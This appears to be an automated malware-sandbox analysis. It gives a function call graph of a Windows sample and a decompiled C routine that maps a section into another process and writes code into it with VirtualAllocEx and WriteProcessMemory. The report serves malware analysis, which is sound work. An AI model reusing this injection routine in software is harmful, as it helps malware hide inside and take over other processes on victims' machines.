5361463 14053->14054 14242 53679c0 14054->14242 14056 536b179 4 API calls 14059 53613f9 14056->14059 14061 53613d4 14057->14061 14065 536b266 5 API calls 14059->14065 14062 5368bf4 2 API calls 14060->14062 14061->14070 14078 536687d 14061->14078 14062->14066 14063 53614aa 14063->14060 14073 536111d 8 API calls 14063->14073 14064 5361498 14067 536111d 8 API calls 14064->14067 14068 5361405 14065->14068 14071 53614a4 14067->14071 14225 5367bf5 14068->14225 14070->14056 14267 53610ec 14071->14267 14073->14071 14077->14050 14275 5368bde RtlAllocateHeap 14078->14275 14080 5366893 14081 536a96c 4 API calls 14080->14081 14177 5366d6c 14080->14177 14082 53668a8 14081->14082 14276 536fbdb 14082->14276 14087 53698bd RtlAllocateHeap 14088 53668cc 14087->14088 14089 53698bd RtlAllocateHeap 14088->14089 14090 53668e0 14089->14090 14091 5366905 14090->14091 14092 53698bd RtlAllocateHeap 14090->14092 14093 53698bd RtlAllocateHeap 14091->14093 14092->14091 14094 536692a 14093->14094 14302 536e7c6 14094->14302 14100 5366996 14101 536109a 2 API calls 14100->14101 14102 53669c3 14101->14102 14103 536109a 2 API calls 14102->14103 14104 53669d2 14103->14104 14105 536109a 2 API calls 14104->14105 14106 53669e1 14105->14106 14107 536109a 2 API calls 14106->14107 14108 53669ee 14107->14108 14109 536109a 2 API calls 14108->14109 14110 53669ff 14109->14110 14111 536109a 2 API calls 14110->14111 14112 5366a10 14111->14112 14113 5369e51 2 API calls 14112->14113 14114 5366a32 14113->14114 14115 536109a 2 API calls 14114->14115 14116 5366a3c 14115->14116 14117 536109a 2 API calls 14116->14117 14118 5366a4c 14117->14118 14119 536109a 2 API calls 14118->14119 14120 5366a5b 14119->14120 14121 536109a 2 API calls 14120->14121 14122 5366a6a 14121->14122 14123 536109a 2 API calls 14122->14123 14124 5366a79 14123->14124 14125 536109a 2 API calls 14124->14125 14126 5366a88 14125->14126 14356 536b6ae 14126->14356 14129 536b6ae 5 API calls 14130 5366aa5 14129->14130 14131 536b6ae 5 API calls 14130->14131 
14132 5366ab5 14131->14132 14133 536b6ae 5 API calls 14132->14133 14134 5366ac5 14133->14134 14135 536b6ae 5 API calls 14134->14135 14136 5366ad2 14135->14136 14137 5366af1 14136->14137 14138 536b6ae 5 API calls 14136->14138 14139 536b6ae 5 API calls 14137->14139 14138->14137 14140 5366aff 14139->14140 14141 536b6ae 5 API calls 14140->14141 14142 5366b0d 14141->14142 14143 536b6ae 5 API calls 14142->14143 14144 5366b1b 14143->14144 14145 536b6ae 5 API calls 14144->14145 14146 5366b29 14145->14146 14147 536b6ae 5 API calls 14146->14147 14148 5366b37 14147->14148 14149 536b6ae 5 API calls 14148->14149 14150 5366b45 14149->14150 14151 5368baf 2 API calls 14150->14151 14152 5366b54 14151->14152 14153 5368baf 2 API calls 14152->14153 14154 5366b5e 14153->14154 14155 5368baf 2 API calls 14154->14155 14156 5366b68 14155->14156 14157 5368baf 2 API calls 14156->14157 14158 5366b72 14157->14158 14159 5368baf 2 API calls 14158->14159 14160 5366b7c 14159->14160 14161 5368baf 2 API calls 14160->14161 14162 5366b86 14161->14162 14163 5368baf 2 API calls 14162->14163 14164 5366b90 14163->14164 14165 5368baf 2 API calls 14164->14165 14166 5366b9a 14165->14166 14167 5368baf 2 API calls 14166->14167 14168 5366ba4 14167->14168 14169 5368baf 2 API calls 14168->14169 14170 5366bae 14169->14170 14171 5368baf 2 API calls 14170->14171 14172 5366bb8 14171->14172 14173 5368baf 2 API calls 14172->14173 14174 5366bc2 14173->14174 14374 5368bde RtlAllocateHeap 14174->14374 14176 5366bd4 14176->14177 14178 5369df2 2 API calls 14176->14178 14177->14070 14179 5366bed 14178->14179 14180 5369df2 2 API calls 14179->14180 14226 53703bd GetTickCount 14225->14226 14227 5367c15 14226->14227 14461 536802c 14227->14461 14626 536970f 14242->14626 14245 53703bd GetTickCount 14246 5367a07 14245->14246 14632 5367df8 14246->14632 14248 5367a27 14249 5367611 19 API calls 14248->14249 14259 536148c 14248->14259 14250 5367a57 14249->14250 14253 53675ab 8 API calls 14250->14253 14266 5367a5e 14250->14266 14251 
5368bf4 2 API calls 14252 5367b2d 14251->14252 14254 5368bf4 2 API calls 14252->14254 14255 5367a88 14253->14255 14256 5367b38 14254->14256 14255->14266 14671 5367858 14255->14671 14257 5368bf4 2 API calls 14256->14257 14257->14259 14259->14063 14259->14064 14260 5367ab6 14260->14266 14684 5367728 14260->14684 14264 5367b02 14706 53676d7 14264->14706 14266->14251 14268 5361104 14267->14268 14269 53610f2 14267->14269 14271 536a96c 4 API calls 14268->14271 14270 536a96c 4 API calls 14269->14270 14272 53610f9 14270->14272 14271->14272 14750 53610c5 14272->14750 14274 536111b 14274->14060 14275->14080 14277 5369e12 2 API calls 14276->14277 14278 53668b3 14277->14278 14279 536e712 14278->14279 14280 5369df2 2 API calls 14279->14280 14281 536e727 14280->14281 14430 536e400 CoInitializeEx CoInitializeSecurity CoCreateInstance 14281->14430 14284 5368baf 2 API calls 14285 536e73f 14284->14285 14286 5369df2 2 API calls 14285->14286 14301 53668b8 14285->14301 14287 536e753 14286->14287 14288 5369df2 2 API calls 14287->14288 14289 536e764 14288->14289 14437 536e656 SysAllocString SysAllocString 14289->14437 14291 536e775 14292 536e7a3 14291->14292 14294 53698bd RtlAllocateHeap 14291->14294 14293 5368baf 2 API calls 14292->14293 14295 536e7ac 14293->14295 14296 536e784 VariantClear 14294->14296 14297 5368baf 2 API calls 14295->14297 14296->14292 14299 536e7b5 14297->14299 14443 536e4b4 14299->14443 14301->14087 14303 5369df2 2 API calls 14302->14303 14304 536e7db 14303->14304 14305 536e400 6 API calls 14304->14305 14306 536e7e5 14305->14306 14307 5368baf 2 API calls 14306->14307 14308 536e7f3 14307->14308 14309 536696c 14308->14309 14310 5369df2 2 API calls 14308->14310 14325 536e87a 14309->14325 14311 536e807 14310->14311 14312 5369df2 2 API calls 14311->14312 14313 536e818 14312->14313 14314 536e656 10 API calls 14313->14314 14315 536e829 14314->14315 14316 536e857 14315->14316 14317 53698bd RtlAllocateHeap 14315->14317 14318 5368baf 2 API calls 14316->14318 14319 536e838 
VariantClear 14317->14319 14320 536e860 14318->14320 14319->14316 14322 5368baf 2 API calls 14320->14322 14323 536e869 14322->14323 14324 536e4b4 2 API calls 14323->14324 14324->14309 14326 5369df2 2 API calls 14325->14326 14327 536e88f 14326->14327 14328 536e400 6 API calls 14327->14328 14329 536e899 14328->14329 14330 5368baf 2 API calls 14329->14330 14331 536e8a7 14330->14331 14332 5369df2 2 API calls 14331->14332 14347 5366974 14331->14347 14333 536e8bb 14332->14333 14334 5369df2 2 API calls 14333->14334 14335 536e8cc 14334->14335 14336 536e656 10 API calls 14335->14336 14337 536e8dd 14336->14337 14338 536e90b 14337->14338 14339 53698bd RtlAllocateHeap 14337->14339 14340 5368baf 2 API calls 14338->14340 14341 536e8ec VariantClear 14339->14341 14342 536e914 14340->14342 14341->14338 14344 5368baf 2 API calls 14342->14344 14345 536e91d 14344->14345 14346 536e4b4 2 API calls 14345->14346 14346->14347 14348 5366f6c 14347->14348 14448 5368bde RtlAllocateHeap 14348->14448 14350 5366f74 14351 5366f9d 14350->14351 14449 5368bde RtlAllocateHeap 14350->14449 14351->14100 14353 5366f85 14353->14351 14354 536ba09 memset 14353->14354 14355 5366f99 14354->14355 14355->14100 14357 5368d6d memset 14356->14357 14358 536b6f2 14357->14358 14359 5368d6d memset 14358->14359 14360 536b6fe 14359->14360 14361 536b856 14360->14361 14364 5366a94 14360->14364 14450 5368bde RtlAllocateHeap 14360->14450 14362 5368bf4 2 API calls 14361->14362 14362->14364 14364->14129 14365 5369a07 2 API calls 14367 536b76d 14365->14367 14366 5369880 RtlAllocateHeap 14366->14367 14367->14361 14367->14364 14367->14365 14367->14366 14368 5368bf4 2 API calls 14367->14368 14369 536b81c 14367->14369 14368->14367 14369->14361 14370 5369930 2 API calls 14369->14370 14371 536b83f 14370->14371 14371->14361 14372 536b845 14371->14372 14373 5368bf4 2 API calls 14372->14373 14373->14364 14374->14176 14431 536e445 SysAllocString 14430->14431 14432 536e482 14430->14432 14433 536e460 14431->14433 14432->14284 14433->14432 
14434 536e464 CoSetProxyBlanket 14433->14434 14434->14432 14435 536e47b 14434->14435 14447 5368bde RtlAllocateHeap 14435->14447 14438 5369df2 2 API calls 14437->14438 14439 536e681 SysAllocString 14438->14439 14440 5368baf 2 API calls 14439->14440 14442 536e694 SysFreeString SysFreeString SysFreeString 14440->14442 14442->14291 14444 536e4bf 14443->14444 14445 5368bf4 2 API calls 14444->14445 14446 536e4dc 14445->14446 14446->14301 14447->14432 14448->14350 14449->14353 14450->14367 14462 5371152 7 API calls 14461->14462 14463 536803c 14462->14463 14464 5368753 strncpy 14463->14464 14465 5368055 14464->14465 14466 5368753 strncpy 14465->14466 14467 5368069 14466->14467 14468 5368753 strncpy 14467->14468 14469 536807a 14468->14469 14470 5368753 strncpy 14469->14470 14471 536808b 14470->14471 14472 5368753 strncpy 14471->14472 14473 53680a1 14472->14473 14474 5368753 strncpy 14473->14474 14475 53680b5 14474->14475 14476 5368753 strncpy 14475->14476 14477 53680ce 14476->14477 14478 5368753 strncpy 14477->14478 14479 53680e2 14478->14479 14480 5368753 strncpy 14479->14480 14481 53680f6 14480->14481 14482 5368753 strncpy 14481->14482 14483 536810a 14482->14483 14484 5368753 strncpy 14483->14484 14485 5368120 14484->14485 14486 5368753 strncpy 14485->14486 14487 5368137 14486->14487 14611 53687af 14487->14611 14490 5368753 strncpy 14491 536814a 14490->14491 14492 5368753 strncpy 14491->14492 14493 536815e 14492->14493 14494 5368753 strncpy 14493->14494 14495 5368172 14494->14495 14496 53687af 5 API calls 14495->14496 14497 536817a 14496->14497 14498 5368753 strncpy 14497->14498 14499 5368185 14498->14499 14500 53687af 5 API calls 14499->14500 14501 536818d 14500->14501 14502 5368753 strncpy 14501->14502 14503 5368198 14502->14503 14504 53687af 5 API calls 14503->14504 14505 53681a0 14504->14505 14506 5368753 strncpy 14505->14506 14507 53681ab 14506->14507 14508 5368753 strncpy 14507->14508 14509 53681bf 14508->14509 14510 53687af 5 API calls 14509->14510 14511 53681c7 
14510->14511 14512 5368753 strncpy 14511->14512 14513 53681d2 14512->14513 14514 5368753 strncpy 14513->14514 14515 53681ec 14514->14515 14516 53687af 5 API calls 14515->14516 14517 53681f4 14516->14517 14518 5368753 strncpy 14517->14518 14519 53681ff 14518->14519 14520 5368753 strncpy 14519->14520 14521 5368213 14520->14521 14522 5368753 strncpy 14521->14522 14523 5368227 14522->14523 14524 53687af 5 API calls 14523->14524 14525 536823b 14524->14525 14526 5368753 strncpy 14525->14526 14527 5368246 14526->14527 14528 5368753 strncpy 14527->14528 14529 536825a 14528->14529 14530 5368753 strncpy 14529->14530 14531 536826e 14530->14531 14532 53687af 5 API calls 14531->14532 14533 5368279 14532->14533 14534 5368753 strncpy 14533->14534 14535 5368284 14534->14535 14536 53687af 5 API calls 14535->14536 14537 536828f 14536->14537 14538 5368753 strncpy 14537->14538 14539 536829a 14538->14539 14540 53687af 5 API calls 14539->14540 14541 53682a5 14540->14541 14542 5368753 strncpy 14541->14542 14543 53682b0 14542->14543 14544 53687af 5 API calls 14543->14544 14545 53682bb 14544->14545 14546 5368753 strncpy 14545->14546 14547 53682c6 14546->14547 14548 53687af 5 API calls 14547->14548 14549 53682d1 14548->14549 14550 5368753 strncpy 14549->14550 14551 53682dc 14550->14551 14552 53687af 5 API calls 14551->14552 14553 53682e7 14552->14553 14554 5368753 strncpy 14553->14554 14555 53682f2 14554->14555 14556 53687af 5 API calls 14555->14556 14557 53682fd 14556->14557 14558 5368753 strncpy 14557->14558 14559 5368308 14558->14559 14560 53687af 5 API calls 14559->14560 14561 5368313 14560->14561 14562 5368753 strncpy 14561->14562 14563 536831e 14562->14563 14564 53687af 5 API calls 14563->14564 14565 5368329 14564->14565 14566 5368753 strncpy 14565->14566 14567 5368334 14566->14567 14568 53687af 5 API calls 14567->14568 14569 5368342 14568->14569 14570 5368753 strncpy 14569->14570 14571 536834d 14570->14571 14572 53687af 5 API calls 14571->14572 14573 5368358 14572->14573 14574 
5368753 strncpy 14573->14574 14575 5368363 14574->14575 14576 53687af 5 API calls 14575->14576 14577 536836e 14576->14577 14578 5368753 strncpy 14577->14578 14616 536996c 14611->14616 14613 536813f 14613->14490 14614 53687c2 14614->14613 14615 5368bf4 2 API calls 14614->14615 14615->14613 14617 536997b WideCharToMultiByte 14616->14617 14624 53699cb 14616->14624 14618 5369996 14617->14618 14617->14624 14625 5368bde RtlAllocateHeap 14618->14625 14620 536999f 14621 53699a7 WideCharToMultiByte 14620->14621 14620->14624 14622 53699c0 14621->14622 14621->14624 14623 5368bf4 2 API calls 14622->14623 14623->14624 14624->14614 14625->14620 14627 536971d 14626->14627 14628 5373674 2 API calls 14627->14628 14629 5369767 14628->14629 14630 5367a02 14629->14630 14631 5373674 2 API calls 14629->14631 14630->14245 14631->14629 14633 5371152 7 API calls 14632->14633 14634 5367e07 14633->14634 14635 5368753 strncpy 14634->14635 14636 5367e1d 14635->14636 14637 5368753 strncpy 14636->14637 14638 5367e32 14637->14638 14639 5368753 strncpy 14638->14639 14640 5367e46 14639->14640 14641 5368753 strncpy 14640->14641 14642 5367e5b 14641->14642 14643 5368753 strncpy 14642->14643 14644 5367e6c 14643->14644 14645 5368753 strncpy 14644->14645 14646 5367e85 14645->14646 14647 5368753 strncpy 14646->14647 14648 5367e9b 14647->14648 14649 5368753 strncpy 14648->14649 14650 5367eac 14649->14650 14651 5368753 strncpy 14650->14651 14652 5367ec0 14651->14652 14653 5368753 strncpy 14652->14653 14654 5367ed3 14653->14654 14655 5368753 strncpy 14654->14655 14656 5367ee7 14655->14656 14657 5368753 strncpy 14656->14657 14658 5367f06 14657->14658 14659 53687af 5 API calls 14658->14659 14660 5367f17 14659->14660 14661 5368753 strncpy 14660->14661 14662 5367f22 14661->14662 14663 53687af 5 API calls 14662->14663 14664 5367f33 14663->14664 14665 5368753 strncpy 14664->14665 14666 5367f3e 14665->14666 14667 5368753 strncpy 14666->14667 14668 5367f5a 14667->14668 14669 5371bd3 13 API calls 14668->14669 14670 
5367f62 14669->14670 14670->14248 14672 5371cc0 18 API calls 14671->14672 14673 5367876 14672->14673 14674 5369edb memset 14673->14674 14677 5367882 14673->14677 14675 53678b6 14674->14675 14675->14677 14713 5368bde RtlAllocateHeap 14675->14713 14677->14260 14678 536798e 14680 5368bf4 2 API calls 14678->14680 14682 536799f 14678->14682 14679 536793a 14679->14677 14679->14678 14681 5369880 RtlAllocateHeap 14679->14681 14680->14678 14681->14679 14683 5368bf4 2 API calls 14682->14683 14683->14677 14685 536773f 14684->14685 14686 536c307 2 API calls 14685->14686 14694 53677cf 14685->14694 14687 536775b 14686->14687 14687->14694 14697 53677a7 14687->14697 14714 5368bde RtlAllocateHeap 14687->14714 14689 5368bf4 2 API calls 14691 53677c5 14689->14691 14690 5367778 14693 5369e12 2 API calls 14690->14693 14690->14697 14692 5368bf4 2 API calls 14691->14692 14692->14694 14695 5367797 14693->14695 14694->14266 14698 5361190 14694->14698 14715 53689dd 14695->14715 14697->14689 14699 536111d 8 API calls 14698->14699 14700 53611a1 14699->14700 14701 53611ae 14700->14701 14702 5368d6d memset 14700->14702 14701->14264 14703 53611c4 14702->14703 14704 5361dd3 6 API calls 14703->14704 14705 53611d4 14704->14705 14705->14264 14731 5367f75 14706->14731 14708 53676f4 14709 5367611 19 API calls 14708->14709 14710 5367714 14709->14710 14711 5368bf4 2 API calls 14710->14711 14712 536771f 14711->14712 14712->14266 14713->14679 14714->14690 14718 5368871 14715->14718 14725 53687e5 14718->14725 14721 53688ca GetLastError 14724 5368959 14721->14724 14722 5368bf4 2 API calls 14723 536889e 14722->14723 14723->14697 14724->14722 14730 5368bde RtlAllocateHeap 14725->14730 14727 53687f6 14728 536883d lstrlenA 14727->14728 14729 536884e 14727->14729 14728->14729 14729->14721 14729->14723 14729->14724 14730->14727 14732 5371152 7 API calls 14731->14732 14733 5367f84 14732->14733 14734 5368753 strncpy 14733->14734 14735 5367f9a 14734->14735 14736 5368753 strncpy 14735->14736 14737 5367fae 
14736->14737 14738 5368753 strncpy 14737->14738 14739 5367fbf 14738->14739 14740 5368753 strncpy 14739->14740 14741 5367fd0 14740->14741 14742 5368753 strncpy 14741->14742 14743 5367fe5 14742->14743 14744 5368753 strncpy 14743->14744 14745 5367ffb 14744->14745 14746 5368753 strncpy 14745->14746 14747 5368011 14746->14747 14748 5371bd3 13 API calls 14747->14748 14749 5368019 14748->14749 14749->14708 14751 5369e12 2 API calls 14750->14751 14752 53610df 14751->14752 14752->14274 15297 536598e 15302 536e4e0 15297->15302 15300 53659a3 GetLastError 15301 53659ac 15300->15301 15327 5368bde RtlAllocateHeap 15302->15327 15304 536e4f7 15305 53698bd RtlAllocateHeap 15304->15305 15324 536599f 15304->15324 15306 536e50c 15305->15306 15306->15324 15328 536a46b 15306->15328 15309 5369df2 2 API calls 15310 536e52c 15309->15310 15311 5369e51 2 API calls 15310->15311 15312 536e541 15311->15312 15313 5368baf 2 API calls 15312->15313 15314 536e54a 15313->15314 15336 536e330 15314->15336 15316 536e554 15317 536e55b 15316->15317 15343 536e374 15316->15343 15319 5368bf4 2 API calls 15317->15319 15320 536e62e 15319->15320 15321 5368bf4 2 API calls 15320->15321 15322 536e639 15321->15322 15323 5368bf4 2 API calls 15322->15323 15323->15324 15324->15300 15324->15301 15325 536e56a 15325->15317 15326 536e601 lstrlenW 15325->15326 15326->15325 15327->15304 15329 536a484 15328->15329 15330 5368c72 3 API calls 15329->15330 15334 536a584 15329->15334 15335 536a4ff 15329->15335 15330->15335 15331 536a55c 15332 5368d6d memset 15331->15332 15331->15334 15332->15334 15333 5368ce0 lstrlenA 15333->15335 15334->15309 15335->15331 15335->15333 15337 5369df2 2 API calls 15336->15337 15338 536e342 15337->15338 15339 5369d18 4 API calls 15338->15339 15340 536e34c 15339->15340 15341 5368baf 2 API calls 15340->15341 15342 536e357 15341->15342 15342->15316 15344 5369a5a 2 API calls 15343->15344 15345 536e38d CoInitializeEx 15344->15345 15346 5369df2 2 API calls 15345->15346 15347 536e3a8 15346->15347 15348 
5369df2 2 API calls 15347->15348 15349 536e3b9 15348->15349 15350 5368baf 2 API calls 15349->15350 15351 536e3d5 15350->15351 15352 5368baf 2 API calls 15351->15352 15353 536e3eb 15352->15353 15354 5368bf4 2 API calls 15353->15354 15355 536e3f6 15354->15355 15355->15325 11224 53664ef 11225 53664fd 11224->11225 11230 5366555 11224->11230 11253 5368bc9 HeapCreate 11225->11253 11227 5366502 11254 5369591 11227->11254 11237 5366550 11240 5368baf 2 API calls 11237->11240 11238 536655a 11274 5368baf 11238->11274 11240->11230 11246 53665b1 CreateThread 11246->11230 11354 5366298 11246->11354 11247 536f05c 8 API calls 11248 536658c 11247->11248 11287 5366370 memset 11248->11287 11253->11227 11306 5368bde RtlAllocateHeap 11254->11306 11256 5366507 11257 5373cd5 11256->11257 11258 5373d0a 11257->11258 11307 5368c43 11258->11307 11260 5366515 11261 536f05c 11260->11261 11311 5369dd8 11261->11311 11264 536f086 LoadLibraryA 11266 536f08d 11264->11266 11265 536f07e GetModuleHandleA 11265->11266 11267 536f09b 11266->11267 11314 536f011 11266->11314 11319 5368b9c 11267->11319 11271 5369df2 11337 5368ac6 11271->11337 11273 536653c GetFileAttributesW 11273->11237 11273->11238 11275 536655f 11274->11275 11276 5368bbd 11274->11276 11278 536109a 11275->11278 11277 5368bf4 2 API calls 11276->11277 11277->11275 11279 5368ac6 2 API calls 11278->11279 11280 53610b5 11279->11280 11281 5369cb5 11280->11281 11282 5369cd1 11281->11282 11286 5366573 11282->11286 11343 5368bde RtlAllocateHeap 11282->11343 11284 5369ce4 11285 5368bf4 2 API calls 11284->11285 11284->11286 11285->11286 11286->11246 11286->11247 11344 5361080 11287->11344 11289 536639c 11290 53663ec 11289->11290 11291 53663ad 11289->11291 11292 5361080 2 API calls 11290->11292 11293 5361080 2 API calls 11291->11293 11294 53663f6 11292->11294 11295 53663b5 11293->11295 11298 5368b9c 2 API calls 11294->11298 11347 5369e12 11295->11347 11297 53663cb 11299 5368b9c 2 API calls 11297->11299 11300 53663d6 11298->11300 11299->11300 11301 
5368bf4 11300->11301 11302 53665a1 11301->11302 11303 5368bfe 11301->11303 11302->11246 11303->11302 11304 5368d6d memset 11303->11304 11305 5368c2e HeapFree 11304->11305 11305->11302 11306->11256 11310 5368bde RtlAllocateHeap 11307->11310 11309 5368c54 11309->11260 11310->11309 11323 53689ef 11311->11323 11330 5368bde RtlAllocateHeap 11314->11330 11316 536f052 11316->11267 11317 536f023 11317->11316 11331 536eebb 11317->11331 11320 5368ba4 11319->11320 11321 536652b 11319->11321 11322 5368bf4 2 API calls 11320->11322 11321->11271 11322->11321 11324 5368a12 11323->11324 11324->11324 11325 5368a6a lstrlenA 11324->11325 11326 5368a78 11325->11326 11328 5368a81 11325->11328 11329 5368bde RtlAllocateHeap 11326->11329 11328->11264 11328->11265 11329->11328 11330->11317 11332 536ef2f 11331->11332 11333 536eed4 11331->11333 11332->11317 11333->11332 11334 536ef87 LoadLibraryA 11333->11334 11334->11332 11335 536ef95 GetProcAddress 11334->11335 11335->11332 11336 536efa1 11335->11336 11336->11332 11338 5368ae4 lstrlenA 11337->11338 11342 5368bde RtlAllocateHeap 11338->11342 11341 5368b60 11341->11273 11341->11341 11342->11341 11343->11284 11345 53689ef 2 API calls 11344->11345 11346 5361096 11345->11346 11346->11289 11351 5368d6d 11347->11351 11350 5369e40 11350->11297 11352 5368d76 memset 11351->11352 11353 5368d87 _vsnprintf 11351->11353 11352->11353 11353->11350 11366 5366412 11354->11366 11358 53662b3 11359 53662a9 11359->11358 11363 53662e3 11359->11363 11429 536d804 11359->11429 11361 536631a 11361->11358 11467 53635a1 11361->11467 11362 5366313 11445 536611b 11362->11445 11363->11361 11363->11362 11367 536f05c 8 API calls 11366->11367 11368 5366426 11367->11368 11369 536f05c 8 API calls 11368->11369 11370 536643f 11369->11370 11371 536f05c 8 API calls 11370->11371 11372 5366458 11371->11372 11373 536f05c 8 API calls 11372->11373 11374 5366471 11373->11374 11375 536f05c 8 API calls 11374->11375 11376 536648a 11375->11376 11377 536f05c 8 API calls 11376->11377 11378 
53664a1 11377->11378 11379 536f05c 8 API calls 11378->11379 11380 53664b8 11379->11380 11381 536f05c 8 API calls 11380->11381 11382 53664cf 11381->11382 11383 536f05c 8 API calls 11382->11383 11384 536629d GetOEMCP 11383->11384 11385 536df3d 11384->11385 11474 5368bde RtlAllocateHeap 11385->11474 11387 536df58 11388 536df63 GetCurrentProcessId 11387->11388 11428 536e2b8 11387->11428 11389 536df7b 11388->11389 11475 536c879 11389->11475 11391 536dfdf 11491 536f3a3 11391->11491 11392 536dfce 11392->11391 11482 536c8c9 11392->11482 11397 536e014 11398 536e064 GetSystemMetrics 11397->11398 11399 536e05e GetLastError 11397->11399 11400 536e08b 11398->11400 11399->11398 11500 536c6ce 11400->11500 11406 536e0c6 11517 536c6e4 11406->11517 11411 5368d6d memset 11412 536e11d GetVersionExA 11411->11412 11536 536dd39 11412->11536 11416 536e13b GetWindowsDirectoryW 11417 5369df2 2 API calls 11416->11417 11418 536e15e 11417->11418 11419 5368baf 2 API calls 11418->11419 11420 536e198 11419->11420 11422 536e1d0 11420->11422 11559 5369e51 11420->11559 11542 537351a 11422->11542 11428->11359 11638 536d6dc 11429->11638 11432 536d950 11432->11363 11434 536d945 11436 5368bf4 2 API calls 11434->11436 11435 536d933 11435->11434 11437 5368bf4 2 API calls 11435->11437 11436->11432 11437->11435 11438 5368d6d memset 11444 536d841 11438->11444 11441 536d8b4 GetLastError 11668 536da57 ResumeThread 11441->11668 11443 536d8de FindCloseChangeNotification 11443->11444 11444->11434 11444->11435 11444->11438 11444->11441 11444->11443 11650 536bc84 11444->11650 11655 536d959 11444->11655 11738 536a608 11445->11738 11448 536612a 11448->11358 11449 5366142 11754 5366247 11449->11754 11452 5366147 11453 53661a0 11452->11453 11454 5366151 11452->11454 11788 536600c 11453->11788 11457 5366156 11454->11457 11458 53661a5 11454->11458 11456 53661c1 11456->11358 11457->11456 11461 536b557 7 API calls 11457->11461 11458->11456 11466 536619e 11458->11466 11801 5370a67 11458->11801 11462 5366176 11461->11462 

Control-flow Graph

C-Code - Quality: 95%
E0536D447(void* __ecx, intOrPtr __edx) {
	void* _v8;
	void* _v12;
	void* _v16;
	void* _v20;
	long _v24;
	long _v28;
	short _v32;
	char _v36;
	intOrPtr* _v40;
	intOrPtr _v44;
	long _v48;
	void* _v52;
	void* _v53;
	char _v64;
	short _v68;
	struct _WNDCLASSEXA _v116;
	char _t81;
	intOrPtr* _t83;
	intOrPtr _t87;
	intOrPtr _t90;
	char _t97;
	short _t98;
	intOrPtr _t105;
	long _t107;
	char _t119;
	void* _t124;
	struct HWND__* _t132;
	void* _t138;
	void* _t147;
	void* _t154;
	intOrPtr _t155;
	intOrPtr _t157;
	void* _t158;
	void* _t163;
	void* _t165;

	_t81 =  *0x537f81c; // 0x546fbe8
	_t138 = 0;
	_v12 = __ecx;
	_t157 = __edx;
	_v20 = 0;
	_v52 = 0;
	_v48 = 0;
	_v16 = 0;
	_v8 = 0;
	_v24 = 0;
	_v44 = __edx;
	if(( *(_t81 + 0x1898) & 0x00000040) != 0) {
		E0536F0DE(0x1f4);
	}
                                                                                                                                                                        				_t12 = _t157 + 0x3c; // 0x852c50ff
                                                                                                                                                                        				_t83 =  *_t12 + _t157;
                                                                                                                                                                        				_v28 = _t138;
                                                                                                                                                                        				_v40 = _t83;
                                                                                                                                                                        				if( *_t83 != 0x4550) {
                                                                                                                                                                        					L14:
                                                                                                                                                                        					_t158 = _v12;
                                                                                                                                                                        					L15:
                                                                                                                                                                        					if(_v8 != _t138) {
                                                                                                                                                                        						_t90 =  *0x537f918; // 0x546f9f0
                                                                                                                                                                        						 *((intOrPtr*)(_t90 + 0x10))(_t158, _v8);
                                                                                                                                                                        						_v8 = _t138;
                                                                                                                                                                        					}
                                                                                                                                                                        					L17:
                                                                                                                                                                        					if(_v16 != 0) {
                                                                                                                                                                        						_t87 =  *0x537f818; // 0x546f8b0
                                                                                                                                                                        						NtUnmapViewOfSection( *((intOrPtr*)(_t87 + 0x12c))(), _v16);
                                                                                                                                                                        					}
                                                                                                                                                                        					if(_v20 != 0) {
                                                                                                                                                                        						NtClose(_v20);
                                                                                                                                                                        					}
                                                                                                                                                                        					return _v8;
                                                                                                                                                                        				}
                                                                                                                                                                        				_v52 =  *((intOrPtr*)(_t83 + 0x50));
                                                                                                                                                                        				if(NtCreateSection( &_v20, 0xe, _t138,  &_v52, 0x40, 0x8000000, _t138) < 0) {
                                                                                                                                                                        					goto L14;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t97 =  *"18293"; // 0x39323831
                                                                                                                                                                        				_v36 = _t97;
                                                                                                                                                                        				_t98 =  *0x537ce44; // 0x33
                                                                                                                                                                        				_v32 = _t98;
                                                                                                                                                                        				_v116.lpszClassName =  &_v64;
                                                                                                                                                                        				asm("movsd");
                                                                                                                                                                        				_v116.lpfnWndProc = DefWindowProcW;
                                                                                                                                                                        				_v116.cbWndExtra = _t138;
                                                                                                                                                                        				asm("movsd");
                                                                                                                                                                        				_v116.style = 0xb;
                                                                                                                                                                        				_v116.lpszMenuName = _t138;
                                                                                                                                                                        				_v116.cbSize = 0x30;
                                                                                                                                                                        				asm("movsb");
                                                                                                                                                                        				_v116.cbClsExtra = _t138;
                                                                                                                                                                        				_v116.hInstance = _t138;
                                                                                                                                                                        				if(RegisterClassExA( &_v116) != 0) {
                                                                                                                                                                        					_t132 = CreateWindowExA(_t138,  &_v64,  &_v36, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, _t138, _t138, _t138, _t138);
                                                                                                                                                                        					if(_t132 != 0) {
                                                                                                                                                                        						DestroyWindow(_t132);
                                                                                                                                                                        						UnregisterClassA( &_v64, _t138);
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				_t105 =  *0x537f818; // 0x546f8b0
                                                                                                                                                                        				_t107 = NtMapViewOfSection(_v20,  *((intOrPtr*)(_t105 + 0x12c))(),  &_v16, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40);
                                                                                                                                                                        				_t158 = _v12;
                                                                                                                                                                        				if(_t107 < 0 || NtMapViewOfSection(_v20, _t158,  &_v8, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40) < 0) {
                                                                                                                                                                        					goto L15;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t154 = E05368C43( *0x537f81c, 0x1ac4);
                                                                                                                                                                        					_v36 = _t154;
                                                                                                                                                                        					if(_t154 == 0) {
                                                                                                                                                                        						goto L15;
                                                                                                                                                                        					}
                                                                                                                                                                        					 *((intOrPtr*)(_t154 + 0x224)) = _v8;
                                                                                                                                                                        					_t163 = VirtualAllocEx(_t158, _t138, 0x1ac4, 0x1000, 4);
                                                                                                                                                                        					WriteProcessMemory(_v12, _t163, _t154, 0x1ac4,  &_v28);
                                                                                                                                                                        					E05368BF4( &_v36, 0x1ac4);
                                                                                                                                                                        					_t119 =  *0x537f81c; // 0x546fbe8
                                                                                                                                                                        					_t155 =  *0x537f830; // 0x5360000
                                                                                                                                                                        					_v36 = _t119;
                                                                                                                                                                        					 *0x537f830 = _v8;
                                                                                                                                                                        					 *0x537f81c = _t163;
                                                                                                                                                                        					E05368CBB(_v16, _v44,  *((intOrPtr*)(_v40 + 0x50)));
                                                                                                                                                                        					E0536D3C6(_v16, _v8, _v44);
                                                                                                                                                                        					_t124 = E0536A43D("quatr");
                                                                                                                                                                        					_v53 = _t138;
